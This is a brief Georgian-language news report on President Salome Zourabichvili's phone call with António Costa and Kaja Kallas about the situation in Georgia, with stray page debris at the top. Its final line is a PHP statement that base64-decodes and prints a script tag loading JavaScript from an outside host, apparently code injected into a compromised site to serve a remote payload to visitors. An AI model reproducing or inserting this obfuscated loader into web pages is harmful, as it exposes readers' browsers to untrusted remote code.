tube
ავერსი jaluzi

საქართველოს პრეზიდენტი სალომე ზურაბიშვილი ქვეყანაში შექმნილ ვითარებასთან დაკავშირებით ევროპული საბჭოს ხელმძღვანელსა და საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში ევროკავშირის უმაღლეს წარმომადგენელს ტელეფონით ესაუბრა.

ამის შესახებ ინფორმაციას პრეზიდენტის ადმინისტრაცია ავრცელებს.

"საქართველოს პრეზიდენტი სალომე ზურაბიშვილი ამ წუთებში, ქვეყანაში არსებულ ვითარებასთან დაკავშირებით, ევროპული საბჭოს ხელმძღვანელს ანტონიო კოსტას და ევროკავშირის უმაღლეს წარმომადგენელს საგარეო საქმეთა და უსაფრთხოების პოლიტიკის საკითხებში კაია კალასს ესაუბრა, რომლებმაც ევროკომისიაში რამდენიმე დღის წინ შარლ მიშელი და ჯოზეფ ბორელი შეცვალეს", - ნათქვამია ინფორმაციაში.

96
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");